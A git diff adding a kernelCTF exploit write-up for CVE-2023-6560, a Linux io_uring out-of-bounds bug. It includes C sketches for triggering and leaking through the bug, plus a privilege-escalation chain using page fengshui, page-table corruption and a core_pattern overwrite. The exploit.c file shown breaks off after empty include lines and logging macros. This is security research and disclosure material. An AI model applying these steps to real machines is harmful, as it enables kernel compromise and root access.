diff --git a/pocs/linux/kernelctf/CVE-2023-6560_mitigation/docs/assets/CVE-2023-6560_mitigation_1.png b/pocs/linux/kernelctf/CVE-2023-6560_mitigation/docs/assets/CVE-2023-6560_mitigation_1.png new file mode 100644 index 00000000..4b740502 Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2023-6560_mitigation/docs/assets/CVE-2023-6560_mitigation_1.png differ diff --git a/pocs/linux/kernelctf/CVE-2023-6560_mitigation/docs/assets/CVE-2023-6560_mitigation_2.png b/pocs/linux/kernelctf/CVE-2023-6560_mitigation/docs/assets/CVE-2023-6560_mitigation_2.png new file mode 100644 index 00000000..7cc63d45 Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2023-6560_mitigation/docs/assets/CVE-2023-6560_mitigation_2.png differ diff --git a/pocs/linux/kernelctf/CVE-2023-6560_mitigation/docs/assets/CVE-2023-6560_mitigation_3.png b/pocs/linux/kernelctf/CVE-2023-6560_mitigation/docs/assets/CVE-2023-6560_mitigation_3.png new file mode 100644 index 00000000..54b336cb Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2023-6560_mitigation/docs/assets/CVE-2023-6560_mitigation_3.png differ diff --git a/pocs/linux/kernelctf/CVE-2023-6560_mitigation/docs/assets/CVE-2023-6560_mitigation_4.png b/pocs/linux/kernelctf/CVE-2023-6560_mitigation/docs/assets/CVE-2023-6560_mitigation_4.png new file mode 100644 index 00000000..89c6832c Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2023-6560_mitigation/docs/assets/CVE-2023-6560_mitigation_4.png differ diff --git a/pocs/linux/kernelctf/CVE-2023-6560_mitigation/docs/assets/CVE-2023-6560_mitigation_5.png b/pocs/linux/kernelctf/CVE-2023-6560_mitigation/docs/assets/CVE-2023-6560_mitigation_5.png new file mode 100644 index 00000000..374cee64 Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2023-6560_mitigation/docs/assets/CVE-2023-6560_mitigation_5.png differ diff --git a/pocs/linux/kernelctf/CVE-2023-6560_mitigation/docs/assets/CVE-2023-6560_mitigation_6.png b/pocs/linux/kernelctf/CVE-2023-6560_mitigation/docs/assets/CVE-2023-6560_mitigation_6.png new file mode 100644 index 00000000..06ca3a73 Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2023-6560_mitigation/docs/assets/CVE-2023-6560_mitigation_6.png differ diff --git a/pocs/linux/kernelctf/CVE-2023-6560_mitigation/docs/exploit.md b/pocs/linux/kernelctf/CVE-2023-6560_mitigation/docs/exploit.md new file mode 100644 index 00000000..d2ed92a6 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2023-6560_mitigation/docs/exploit.md @@ -0,0 +1,690 @@ +## Trigger the vulnerability + +The vulnerability was reported by Jann Horn. The original report and POC can be found at [io_uring: __io_uaddr_map() handles multi-page region dangerously - Project Zero](https://project-zero.issues.chromium.org/issues/42451652). I highly recommend reading the original report before proceeding. 
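+
+In short, the buggy mapping helper only compares the first and the last entry of the pinned page array, so a user buffer whose first and last virtual pages alias the same physical page passes the check even though the pages in between are unrelated. The sketch below shows one hedged way to build such a buffer; the `memfd` here is purely illustrative, while the exploit described later aliases a packet-socket ring instead so that it can also influence the physical layout of the middle pages:
+
+```c
+/*
+ * Hedged sketch, not the actual exploit: build an NPAGES buffer whose first
+ * and last virtual pages are backed by the same physical page, while the
+ * pages in between are ordinary (and generally discontiguous) shmem pages.
+ * Such a buffer passes the `page_array[0] != page_array[ret - 1]` check in
+ * __io_uaddr_map() shown below.
+ */
+#define _GNU_SOURCE
+#include <err.h>
+#include <sys/mman.h>
+#include <unistd.h>
+
+#define NPAGES 8
+#define PG 4096UL
+
+static void *alias_first_and_last(void)
+{
+  int fd = memfd_create("alias", 0);
+  if (fd < 0 || ftruncate(fd, NPAGES * PG) < 0)
+    err(1, "memfd");
+
+  char *buf = mmap(NULL, NPAGES * PG, PROT_READ | PROT_WRITE,
+                   MAP_SHARED, fd, 0);
+  if (buf == MAP_FAILED)
+    err(1, "mmap");
+
+  /* Remap file page 0 over the last virtual page: now the first and last
+   * pages of buf share one struct page. */
+  if (mmap(buf + (NPAGES - 1) * PG, PG, PROT_READ | PROT_WRITE,
+           MAP_SHARED | MAP_FIXED, fd, 0) == MAP_FAILED)
+    err(1, "mmap alias");
+  return buf;
+}
+```
+
+Passing two buffers built like this via `p.sq_off.user_addr` and `p.cq_off.user_addr`, with `IORING_SETUP_NO_MMAP` set in `io_uring_params.flags`, is enough to reach the vulnerable mapping code described next.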
+ +Since [03d89a2de25b](https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=03d89a2de25b), the kernel has provided a mechanism to use user-allocated memory for rings and SQEs: + +```c +static __cold int io_allocate_scq_urings(struct io_ring_ctx *ctx, + struct io_uring_params *p) +{ + /*...*/ + if (!(ctx->flags & IORING_SETUP_NO_MMAP)) + rings = io_mem_alloc(size); + else + rings = io_rings_map(ctx, p->cq_off.user_addr, size); + + if (IS_ERR(rings)) + return PTR_ERR(rings); + + ctx->rings = rings; + /*...*/ + if (!(ctx->flags & IORING_SETUP_NO_MMAP)) + ptr = io_mem_alloc(size); + else + ptr = io_sqes_map(ctx, p->sq_off.user_addr, size); + + if (IS_ERR(ptr)) { + io_rings_free(ctx); + return PTR_ERR(ptr); + } + + ctx->sq_sqes = ptr; + return 0; +} + +static void *io_rings_map(struct io_ring_ctx *ctx, unsigned long uaddr, + size_t size) +{ + return __io_uaddr_map(&ctx->ring_pages, &ctx->n_ring_pages, uaddr, + size); +} + +static void *io_sqes_map(struct io_ring_ctx *ctx, unsigned long uaddr, + size_t size) +{ + return __io_uaddr_map(&ctx->sqe_pages, &ctx->n_sqe_pages, uaddr, + size); +} + +static void *__io_uaddr_map(struct page ***pages, unsigned short *npages, + unsigned long uaddr, size_t size) +{ + /*...*/ + ret = pin_user_pages_fast(uaddr, nr_pages, FOLL_WRITE | FOLL_LONGTERM, + page_array); + if (ret != nr_pages) { +err: + io_pages_free(&page_array, ret > 0 ? ret : 0); + return ret < 0 ? ERR_PTR(ret) : ERR_PTR(-EFAULT); + } + /* + * Should be a single page. If the ring is small enough that we can + * use a normal page, that is fine. If we need multiple pages, then + * userspace should use a huge page. That's the only way to guarantee + * that we get contigious memory, outside of just being lucky or + * (currently) having low memory fragmentation. + */ + if (page_array[0] != page_array[ret - 1]) + goto err; + + /*...*/ + + *pages = page_array; // <--- ctx->{ring, sqe}_pages = page_array + *npages = nr_pages; // <--- ctx->n_{ring, sqe}_pages = nr_pages + return page_to_virt(page_array[0]); +} +``` + +However, because the check to ensure all user-provided pages come from a single page is incorrect, the kernel mistakenly treats the memory as contiguous. This can lead to out-of-bounds memory access in situations like the one illustrated below: + +![CVE-2023-6560_mitigation_1](./assets/CVE-2023-6560_mitigation_1.png) + +## Exploit Details + +### Primitive Overview + +The primitive we have is page-level out-of-bounds access. + +Because we must set the `IORING_SETUP_NO_MMAP` flag to trigger the vulnerability, we cannot directly mmap the pages into userspace to turn this into a straightforward page use-after-free scenario: + +```c +static void *io_uring_validate_mmap_request(struct file *file, + loff_t pgoff, size_t sz) +{ + struct io_ring_ctx *ctx = file->private_data; + loff_t offset = pgoff << PAGE_SHIFT; + struct page *page; + void *ptr; + + /* Don't allow mmap if the ring was setup without it */ + if (ctx->flags & IORING_SETUP_NO_MMAP) + return ERR_PTR(-EINVAL); + /*...*/ + return ptr; +} +``` + +Next, let's see what happens inside io_uring when using the aforementioned primitive. 
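+
+From the user's point of view, "using the primitive" is just the normal no-mmap submission flow: write SQEs into the user-supplied SQ buffer, advance the SQ tail stored in the user-supplied rings buffer (at the byte offset reported in `params.sq_off.tail`), and call `io_uring_enter()`. A hedged sketch, assuming the ring was created with `IORING_SETUP_NO_MMAP | IORING_SETUP_NO_SQARRAY` as in the exploit below (the helper and its arguments are illustrative):
+
+```c
+#include <linux/io_uring.h>
+#include <string.h>
+#include <sys/syscall.h>
+#include <unistd.h>
+
+/* sq_user / rings_user are the buffers passed in sq_off.user_addr and
+ * cq_off.user_addr, p is the io_uring_params filled in by io_uring_setup(),
+ * and ring_fd is its return value. */
+static void submit_nops(int ring_fd, struct io_uring_params *p,
+                        void *sq_user, void *rings_user, unsigned int n)
+{
+  struct io_uring_sqe *sqes = sq_user;
+  unsigned int *sq_tail =
+      (unsigned int *)((char *)rings_user + p->sq_off.tail);
+
+  for (unsigned int i = 0; i < n; i++) {
+    /* With IORING_SETUP_NO_SQARRAY the kernel consumes SQEs in ring order,
+     * so the slot is simply tail & (sq_entries - 1). */
+    struct io_uring_sqe *sqe = &sqes[*sq_tail & (p->sq_entries - 1)];
+
+    memset(sqe, 0, sizeof(*sqe));
+    sqe->opcode = IORING_OP_NOP;
+    sqe->user_data = i; /* copied verbatim into the matching CQE */
+
+    (*sq_tail)++; /* the kernel reads this tail from our rings page */
+    syscall(__NR_io_uring_enter, ring_fd, 1, 0, 0, 0);
+  }
+}
+```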
+ +When a user calls the `io_uring_enter` syscall to consume an SQE, the kernel fetches that SQE from `ctx->sqes`: + +``` c +static bool io_get_sqe(struct io_ring_ctx *ctx, const struct io_uring_sqe **sqe) +{ + unsigned mask = ctx->sq_entries - 1; + unsigned head = ctx->cached_sq_head++ & mask; + /*...*/ + *sqe = &ctx->sq_sqes[head]; + return true; +} +``` + +It then initializes the io_uring request (req) based on the contents of the SQE: + +```c +static int io_init_req(struct io_ring_ctx *ctx, struct io_kiocb *req, + const struct io_uring_sqe *sqe) + __must_hold(&ctx->uring_lock) +{ + const struct io_issue_def *def; + unsigned int sqe_flags; + int personality; + u8 opcode; + + /* req is partially pre-initialised, see io_preinit_req() */ + req->opcode = opcode = READ_ONCE(sqe->opcode); + /* same numerical values with corresponding REQ_F_*, safe to copy */ + req->flags = sqe_flags = READ_ONCE(sqe->flags); + req->cqe.user_data = READ_ONCE(sqe->user_data); + req->file = NULL; + req->rsrc_node = NULL; + req->task = current; + + if (unlikely(opcode >= IORING_OP_LAST)) { + req->opcode = 0; + return -EINVAL; + } + def = &io_issue_defs[opcode]; + /*...*/ + return def->prep(req, sqe); +} +``` + +When an SQE completes, the kernel writes the result to the CQ ring: + +```c +static inline bool io_get_cqe_overflow(struct io_ring_ctx *ctx, + struct io_uring_cqe **ret, + bool overflow) +{ + io_lockdep_assert_cq_locked(ctx); + + if (unlikely(ctx->cqe_cached >= ctx->cqe_sentinel)) { + if (unlikely(!io_cqe_cache_refill(ctx, overflow))) + return false; + } + *ret = ctx->cqe_cached; + ctx->cached_cq_tail++; + ctx->cqe_cached++; + if (ctx->flags & IORING_SETUP_CQE32) + ctx->cqe_cached++; + return true; +} + +static inline bool io_get_cqe(struct io_ring_ctx *ctx, struct io_uring_cqe **ret) +{ + return io_get_cqe_overflow(ctx, ret, false); +} + +static __always_inline bool io_fill_cqe_req(struct io_ring_ctx *ctx, + struct io_kiocb *req) +{ + struct io_uring_cqe *cqe; + + /* + * If we can't get a cq entry, userspace overflowed the + * submission (by quite a lot). Increment the overflow count in + * the ring. + */ + if (unlikely(!io_get_cqe(ctx, &cqe))) + return false; + + if (trace_io_uring_complete_enabled()) + trace_io_uring_complete(req->ctx, req, req->cqe.user_data, + req->cqe.res, req->cqe.flags, + req->big_cqe.extra1, req->big_cqe.extra2); + + memcpy(cqe, &req->cqe, sizeof(*cqe)); + if (ctx->flags & IORING_SETUP_CQE32) { + memcpy(cqe->big_cqe, &req->big_cqe, sizeof(*cqe)); + memset(&req->big_cqe, 0, sizeof(req->big_cqe)); + } + return true; +} +``` + +It is clear that we can submit enough SQEs to carry out out-of-bounds writes. Meanwhile, if the kernel interprets a memory region (e.g., part of a kernel object) as an SQE, it will subsequently copy `sqe->user_data` into `cqe->user_data`, thereby leaking values from the kernel object’s members. + +By abusing this out-of-bounds access: + +- We can leak KASLR or other kernel addresses through the SQ. + +- We can perform out-of-bounds writes using the CQ. 
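+
+The leak side of this can be read back without any extra work: the CQ ring lives in memory we supplied, so CQEs that land inside our own page — including `user_data` values copied out of out-of-bounds "SQEs" — are directly visible to us. A hedged sketch of harvesting them (the offsets come from the `io_uring_params` filled in by `io_uring_setup()`):
+
+```c
+#include <linux/io_uring.h>
+#include <stdio.h>
+
+/* Walk the CQEs the kernel wrote into our user-supplied rings buffer. When
+ * the corresponding "SQEs" were really out-of-bounds kernel memory, the
+ * user_data values printed here are leaked kernel data. */
+static void dump_cqes(struct io_uring_params *p, void *rings_user)
+{
+  struct io_uring_cqe *cqes =
+      (struct io_uring_cqe *)((char *)rings_user + p->cq_off.cqes);
+  unsigned int head = *(unsigned int *)((char *)rings_user + p->cq_off.head);
+  unsigned int tail = *(unsigned int *)((char *)rings_user + p->cq_off.tail);
+
+  for (; head != tail; head++) {
+    struct io_uring_cqe *cqe = &cqes[head & (p->cq_entries - 1)];
+    printf("cqe: user_data=0x%llx res=%d\n",
+           (unsigned long long)cqe->user_data, cqe->res);
+  }
+}
+```
+
+Only the CQEs that fall inside our own CQ page are visible this way; the ones the kernel writes past it are exactly the out-of-bounds write primitive used in the rest of the exploit.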
+ +### Preserving SQ Functionality + +When the `IORING_SETUP_NO_MMAP` flag is set, we must trigger the vulnerability in both the SQ and CQ simultaneously: + +```c +static __cold int io_allocate_scq_urings(struct io_ring_ctx *ctx, + struct io_uring_params *p) +{ + /*...*/ + if (!(ctx->flags & IORING_SETUP_NO_MMAP)) + rings = io_mem_alloc(size); + else + rings = io_rings_map(ctx, p->cq_off.user_addr, size); + + if (IS_ERR(rings)) + return PTR_ERR(rings); + + ctx->rings = rings; + /*...*/ + if (!(ctx->flags & IORING_SETUP_NO_MMAP)) + ptr = io_mem_alloc(size); + else + ptr = io_sqes_map(ctx, p->sq_off.user_addr, size); + + if (IS_ERR(ptr)) { + io_rings_free(ctx); + return PTR_ERR(ptr); + } + + ctx->sq_sqes = ptr; + return 0; +} +``` + +Because `io_uring_sqe` is significantly larger than `io_uring_cqe`, we want to ensure more controllable space in the SQ for stable out-of-bounds writes: + +```c +➜ pahole -C io_uring_sqe ./vmlinux +struct io_uring_sqe { + __u8 opcode; /* 0 1 */ + __u8 flags; /* 1 1 */ + __u16 ioprio; /* 2 2 */ + __s32 fd; /* 4 4 */ + /*...*/ + union { + struct { + __u64 addr3; /* 48 8 */ + __u64 __pad2[1]; /* 56 8 */ + }; /* 48 16 */ + __u8 cmd[0]; /* 48 0 */ + }; /* 48 16 */ + + /* size: 64, cachelines: 1, members: 13 */ +}; + +➜ pahole -C io_uring_cqe ./vmlinux +struct io_uring_cqe { + __u64 user_data; /* 0 8 */ + __s32 res; /* 8 4 */ + __u32 flags; /* 12 4 */ + __u64 big_cqe[]; /* 16 0 */ + + /* size: 16, cachelines: 1, members: 4 */ + /* last cacheline: 16 bytes */ +}; +``` + +To create more easily controlled kernel memory, we can use a function like `packet_mmap()` to obtain a continuous virtual address range: + +```c +static struct pgv *alloc_pg_vec(struct tpacket_req *req, int order) +{ + unsigned int block_nr = req->tp_block_nr; + struct pgv *pg_vec; + int i; + + /*...*/ + + for (i = 0; i < block_nr; i++) { + // 👇 We can control the `order` to get a continuous memory + pg_vec[i].buffer = alloc_one_pg_vec_page(order); + /*...*/ + } + +out: + return pg_vec; + + /*...*/ +} + +static int packet_mmap(struct file *file, struct socket *sock, + struct vm_area_struct *vma) +{ + /*...*/ + for (i = 0; i < rb->pg_vec_len; i++) { + struct page *page; + void *kaddr = rb->pg_vec[i].buffer; + int pg_num; + + for (pg_num = 0; pg_num < rb->pg_vec_pages; pg_num++) { + page = pgv_to_page(kaddr); + err = vm_insert_page(vma, start, page); + if (unlikely(err)) + goto out; + start += PAGE_SIZE; + kaddr += PAGE_SIZE; + } + } + /*...*/ + return err; +} +``` + +With this approach, we can simplify the exploit and increase reliability. To make the whole exploit even more reliable, ideally, we want an exploit chain where we only do an out-of-bounds write in the CQ, preserving SQ functionality. + +![CVE-2023-6560_mitigation_2](./assets/CVE-2023-6560_mitigation_2.png) + +### Page Fengshui + +The object we choose to corrupt is the page table entry. We use "page fengshui" to shape the pages, with the primary goal of maintaining pages' continuity by splitting lower-order pages from higher-order pages. + +We begin by allocating multiple pages and classifying them for two different uses. First, we occupy some discontinuous order-0 pages. Next, for the remaining pages, we free those whose indices satisfy `indices % 4 == 0`, and hopefully reuse one of the freed slots for a `pg_vec` array(We only care about the first `pg_vec` buffer, which later will serve as CQ’s Page A). Finally, we free the pages whose indices satisfy `indices % 4 != 0`, and spray page table entries in their place. 
This arrangement makes it likely that CQ’s Page A ends up adjacent to the page table entries we intend to corrupt:
+
+![CVE-2023-6560_mitigation_3](./assets/CVE-2023-6560_mitigation_3.png)
+
+If this is your first time playing with page table entries, I highly recommend reading the blog post below before proceeding.
+
+[How a simple Linux kernel memory corruption bug can lead to complete system compromise - Project Zero](https://googleprojectzero.blogspot.com/2021/10/how-simple-linux-kernel-memory.html#:~:text=Attack%20stage%3A%20Reallocating%20the%20victim%20page%20as%20a%20pagetable)
+
+### Leak Through Write
+
+Early in the kernel boot process, a global variable called `real_mode_header` is always allocated at a **fixed physical address** (`0x98000`). Its location depends only on how memblock allocations are handled, which is why it ends up at the same address on every boot:
+
+```c
+// start_kernel() -> setup_arch() -> reserve_real_mode()
+/**
+ * memblock_phys_alloc_range - allocate a memory block inside specified range
+ * @size: size of memory block to be allocated in bytes
+ * @align: alignment of the region and block's size
+ * @start: the lower bound of the memory region to allocate (physical address)
+ * @end: the upper bound of the memory region to allocate (physical address)
+ *
+ * Allocate @size bytes in the between @start and @end.
+ *
+ * Return: physical address of the allocated memory block on success,
+ * %0 on failure.
+ */
+phys_addr_t __init memblock_phys_alloc_range(phys_addr_t size,
+					     phys_addr_t align,
+					     phys_addr_t start,
+					     phys_addr_t end)
+{
+	memblock_dbg("%s: %llu bytes align=0x%llx from=%pa max_addr=%pa %pS\n",
+		     __func__, (u64)size, (u64)align, &start, &end,
+		     (void *)_RET_IP_);
+	return memblock_alloc_range_nid(size, align, start, end, NUMA_NO_NODE,
+					false);
+}
+
+static inline void set_real_mode_mem(phys_addr_t mem)
+{
+	real_mode_header = (struct real_mode_header *) __va(mem);
+}
+
+void __init reserve_real_mode(void)
+{
+	phys_addr_t mem;
+	size_t size = real_mode_size_needed();
+
+	if (!size)
+		return;
+
+	WARN_ON(slab_is_available());
+
+	mem = memblock_phys_alloc_range(size, PAGE_SIZE, 0, 1<<20);
+	if (!mem)
+		pr_info("No sub-1M memory is available for the trampoline\n");
+	else
+		set_real_mode_mem(mem);
+
+	memblock_reserve(0, SZ_1M);
+}
+```
+
+Later, in `kernel_init() -> kernel_init_freeable() -> do_pre_smp_initcalls() -> do_init_real_mode() -> setup_real_mode()`, the kernel copies fixed data to `real_mode_header` and relocates it:
+
+```c
+static void __init setup_real_mode(void)
+{
+	u16 real_mode_seg;
+	const u32 *rel;
+	u32 count;
+	unsigned char *base;
+	unsigned long phys_base;
+	struct trampoline_header *trampoline_header;
+	size_t size = PAGE_ALIGN(real_mode_blob_end - real_mode_blob);
+#ifdef CONFIG_X86_64
+	u64 *trampoline_pgd;
+	u64 efer;
+	int i;
+#endif
+
+	base = (unsigned char *)real_mode_header;
+
+	/*...*/
+
+	memcpy(base, real_mode_blob, size);
+	// 👇 Fixed address 0x98000
+	phys_base = __pa(base);
+	real_mode_seg = phys_base >> 4;
+
+	rel = (u32 *) real_mode_relocs;
+
+	/* 16-bit segment relocations. */
+	count = *rel++;
+	while (count--) {
+		u16 *seg = (u16 *) (base + *rel++);
+		*seg = real_mode_seg;
+	}
+
+	/* 32-bit linear relocations. */
+	count = *rel++;
+	while (count--) {
+		u32 *ptr = (u32 *) (base + *rel++);
+		*ptr += phys_base;
+	}
+
+	/* Must be performed *after* relocation. 
*/ + trampoline_header = (struct trampoline_header *) + __va(real_mode_header->trampoline_header); + + /*...*/ + rdmsrl(MSR_EFER, efer); + trampoline_header->efer = efer & ~EFER_LMA; + + trampoline_header->start = (u64) secondary_startup_64; + trampoline_cr4_features = &trampoline_header->cr4; + *trampoline_cr4_features = mmu_cr4_features; + + trampoline_header->flags = 0; + + trampoline_lock = &trampoline_header->lock; + *trampoline_lock = 0; + + trampoline_pgd = (u64 *) __va(real_mode_header->trampoline_pgd); + + /* Map the real mode stub as virtual == physical */ + trampoline_pgd[0] = trampoline_pgd_entry.pgd; + + /*...*/ +} +``` + +After relocation, `__va(real_mode_header->trampoline_pgd)` is set to `0x9c000` (which is `0x4000 + 0x98000` ), and `trampoline_pgd_entry.pgd` is copied there as both virtual and physical address point to the same location after all. + +![CVE-2023-6560_mitigation_4](./assets/CVE-2023-6560_mitigation_4.png) + +```c +// pahole -C real_mode_header ./vmlinux +struct real_mode_header { + /*..*/ + u32 trampoline_pgd; /* 24 4 */ + /*..*/ + /* size: 44, cachelines: 1, members: 11 */ +}; +``` + +`0x9c000` in memory shows like: + +![CVE-2023-6560_mitigation_6](./assets/CVE-2023-6560_mitigation_6.png) + +**What is the `trampoline_pgd_entry.pgd`** + +The `tramoline_pgd_entry` is initialized at `init_trampoline()`: + +```c +static void __init init_trampoline(void) +{ +#ifdef CONFIG_X86_64 + /* + * The code below will alias kernel page-tables in the user-range of the + * address space, including the Global bit. So global TLB entries will + * be created when using the trampoline page-table. + */ + if (!kaslr_memory_enabled()) + trampoline_pgd_entry = init_top_pgt[pgd_index(__PAGE_OFFSET)]; + else + init_trampoline_kaslr(); +#endif +} +``` + +When KASLR is enabled, `trampoline_pgd_entry` consists of the physical address of `pud_page_tramp` plus page table flags: + +```c +void __meminit init_trampoline_kaslr(void) +{ + pud_t *pud_page_tramp, *pud, *pud_tramp; + p4d_t *p4d_page_tramp, *p4d, *p4d_tramp; + unsigned long paddr, vaddr; + pgd_t *pgd; + + pud_page_tramp = alloc_low_page(); + + /* + * There are two mappings for the low 1MB area, the direct mapping + * and the 1:1 mapping for the real mode trampoline: + * + * Direct mapping: virt_addr = phys_addr + PAGE_OFFSET + * 1:1 mapping: virt_addr = phys_addr + */ + paddr = 0; + vaddr = (unsigned long)__va(paddr); + pgd = pgd_offset_k(vaddr); + + p4d = p4d_offset(pgd, vaddr); + pud = pud_offset(p4d, vaddr); + + pud_tramp = pud_page_tramp + pud_index(paddr); + *pud_tramp = *pud; + + if (pgtable_l5_enabled()) { + p4d_page_tramp = alloc_low_page(); + + p4d_tramp = p4d_page_tramp + p4d_index(paddr); + + set_p4d(p4d_tramp, + __p4d(_KERNPG_TABLE | __pa(pud_page_tramp))); + + trampoline_pgd_entry = + __pgd(_KERNPG_TABLE | __pa(p4d_page_tramp)); + } else { + trampoline_pgd_entry = + __pgd(_KERNPG_TABLE | __pa(pud_page_tramp)); + } +} +``` + +When "`the allocating memory is not overlapping with brk pgt`" and `(pgt_buf_end + num) <= pgt_buf_top`, the `alloc_low_page()` function calls `extend_brk()` to allocate memory: + +```c +static inline void *alloc_low_page(void) +{ + return alloc_low_pages(1); +} + +__ref void *alloc_low_pages(unsigned int num) +{ + unsigned long pfn; + int i; + + if (after_bootmem) { + unsigned int order; + + order = get_order((unsigned long)num << PAGE_SHIFT); + return (void *)__get_free_pages(GFP_ATOMIC | __GFP_ZERO, order); + } + + if ((pgt_buf_end + num) > pgt_buf_top || !can_use_brk_pgt) { + unsigned long ret = 
0; + + if (min_pfn_mapped < max_pfn_mapped) { + ret = memblock_phys_alloc_range( + PAGE_SIZE * num, PAGE_SIZE, + min_pfn_mapped << PAGE_SHIFT, + max_pfn_mapped << PAGE_SHIFT); + } + if (!ret && can_use_brk_pgt) + ret = __pa(extend_brk(PAGE_SIZE * num, PAGE_SIZE)); + + if (!ret) + panic("alloc_low_pages: can not alloc memory"); + + pfn = ret >> PAGE_SHIFT; + } else { + pfn = pgt_buf_end; + pgt_buf_end += num; + } + + for (i = 0; i < num; i++) { + void *adr; + + adr = __va((pfn + i) << PAGE_SHIFT); + clear_page(adr); + } + + return __va(pfn << PAGE_SHIFT); +} +``` + +This means the allocated page comes from the `_brk` area near the end of the `.bss` section. + +![CVE-2023-6560_mitigation_5](./assets/CVE-2023-6560_mitigation_5.png) + +Regardless of the complicated analysis, the conclusion is straightforward: if you can leak the value at physical address `0x9c000`, you can obtain the physical locations of the other parts of the kernel image. + +**Slight difference caused by KASLR** + +KASLR can introduce a small variation in the outcome, due to different initialization of `trampoline_pgd_entry`: + +```c +static void __init init_trampoline(void) +{ + if (!kaslr_memory_enabled()) + trampoline_pgd_entry = init_top_pgt[pgd_index(__PAGE_OFFSET)]; + else + init_trampoline_kaslr(); +} +``` + +When KASLR is disabled, the kernel directly uses `init_top_pgt[pgd_index(__PAGE_OFFSET)]` as `trampoline_pgd_entry`. + +Because `__kernel_physical_mapping_init()` calls several `alloc_low_page()` operations in advance when setting `init_top_pgt[pgd_index(__PAGE_OFFSET)]` and its related page entries: + +```c +static unsigned long __meminit +__kernel_physical_mapping_init(unsigned long paddr_start, + unsigned long paddr_end, + unsigned long page_size_mask, + pgprot_t prot, bool init) +{ + bool pgd_changed = false; + unsigned long vaddr, vaddr_start, vaddr_end, vaddr_next, paddr_last; + + paddr_last = paddr_end; + vaddr = (unsigned long)__va(paddr_start); + vaddr_end = (unsigned long)__va(paddr_end); + vaddr_start = vaddr; + + for (; vaddr < vaddr_end; vaddr = vaddr_next) { + pgd_t *pgd = pgd_offset_k(vaddr); + p4d_t *p4d; + + vaddr_next = (vaddr & PGDIR_MASK) + PGDIR_SIZE; + + if (pgd_val(*pgd)) { + p4d = (p4d_t *)pgd_page_vaddr(*pgd); + paddr_last = phys_p4d_init(p4d, __pa(vaddr), + __pa(vaddr_end), + page_size_mask, + prot, init); + continue; + } + + p4d = alloc_low_page(); + paddr_last = phys_p4d_init(p4d, __pa(vaddr), __pa(vaddr_end), + page_size_mask, prot, init); + + spin_lock(&init_mm.page_table_lock); + if (pgtable_l5_enabled()) + pgd_populate_init(&init_mm, pgd, p4d, init); + else + p4d_populate_init(&init_mm, p4d_offset(pgd, vaddr), + (pud_t *) p4d, init); + + spin_unlock(&init_mm.page_table_lock); + pgd_changed = true; + } + + if (pgd_changed) + sync_global_pgds(vaddr_start, vaddr_end - 1); + + return paddr_last; +} +``` + +This can reduce a `0x3000` offset in `_brk` for `trampoline_pgd_entry` when KASLR is disabled. + +### Overwrite `core_pattern` + +Once we have the physical address, we can leverage our out-of-bounds write to modify another page table entry and ultimately gain arbitrary read/write access to physical pages. In this exploit, we overwrite `core_pattern` to gain privileges and retrieve the flag. + +## Stability Notes + +Because we corrupt only a small amount of data (two CQEs, i.e., 32 bytes), the chance of crashing the kernel is relatively low. If the exploit fails, we simply retry. 
This approach can yield a high success rate, such that we might achieve ten successful runs out of ten attempts. + diff --git a/pocs/linux/kernelctf/CVE-2023-6560_mitigation/docs/vulnerability.md b/pocs/linux/kernelctf/CVE-2023-6560_mitigation/docs/vulnerability.md new file mode 100644 index 00000000..5999539c --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2023-6560_mitigation/docs/vulnerability.md @@ -0,0 +1,31 @@ +# Vulneribility +An out-of-bounds memory access flaw was found in the io_uring SQ/CQ rings functionality in the Linux kernel. + +## Requirements to trigger the vulnerability + - Capabilities: N / A + - Kernel configuration: `CONFIG_IO_URING` + - Are user namespaces needed?: NO for triggering the bug, YES for my exploit but could be avoided. + +## Commit which introduced the vulnerability +[io_uring: support for user allocated memory for rings/sqes](https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=03d89a2de25bbc5c77e61a0cf77663978c4b6ea7) + +## Commit which fixed the vulnerability +[io_uring: don't allow discontig pages for IORING_SETUP_NO_MMAP](https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=820d070feb668aab5bc9413c285a1dda2a70e076) + +## Affected kernel versions +- before 6.6.5 + +## Affected component, subsystem +- io_uring + +## Cause +- out-of-bounds memory access + +## Related syscalls + +- io_uring_setup +- io_uring_enter + +## CVE URL + +[NVD - CVE-2023-6560](https://nvd.nist.gov/vuln/detail/CVE-2023-6560) \ No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2023-6560_mitigation/exploit/mitigation-v4-6.6/Makefile b/pocs/linux/kernelctf/CVE-2023-6560_mitigation/exploit/mitigation-v4-6.6/Makefile new file mode 100644 index 00000000..398a518c --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2023-6560_mitigation/exploit/mitigation-v4-6.6/Makefile @@ -0,0 +1,7 @@ +all: exploit + +exploit: exploit.c + gcc -o exploit exploit.c -static + +clean: + rm -rf exploit diff --git a/pocs/linux/kernelctf/CVE-2023-6560_mitigation/exploit/mitigation-v4-6.6/exploit b/pocs/linux/kernelctf/CVE-2023-6560_mitigation/exploit/mitigation-v4-6.6/exploit new file mode 100755 index 00000000..041b0b92 Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2023-6560_mitigation/exploit/mitigation-v4-6.6/exploit differ diff --git a/pocs/linux/kernelctf/CVE-2023-6560_mitigation/exploit/mitigation-v4-6.6/exploit.c b/pocs/linux/kernelctf/CVE-2023-6560_mitigation/exploit/mitigation-v4-6.6/exploit.c new file mode 100644 index 00000000..3dbfaa57 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2023-6560_mitigation/exploit/mitigation-v4-6.6/exploit.c @@ -0,0 +1,418 @@ +#define _GNU_SOURCE +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#define COLOR_GREEN "\033[32m" +#define COLOR_RED "\033[31m" +#define COLOR_YELLOW "\033[33m" +#define COLOR_DEFAULT "\033[0m" + +#define logd(fmt, ...) \ + dprintf(2, "[*] %s:%d " fmt "\n", __FILE__, __LINE__, ##__VA_ARGS__) +#define logi(fmt, ...) \ + dprintf(2, COLOR_GREEN "[+] %s:%d " fmt "\n" 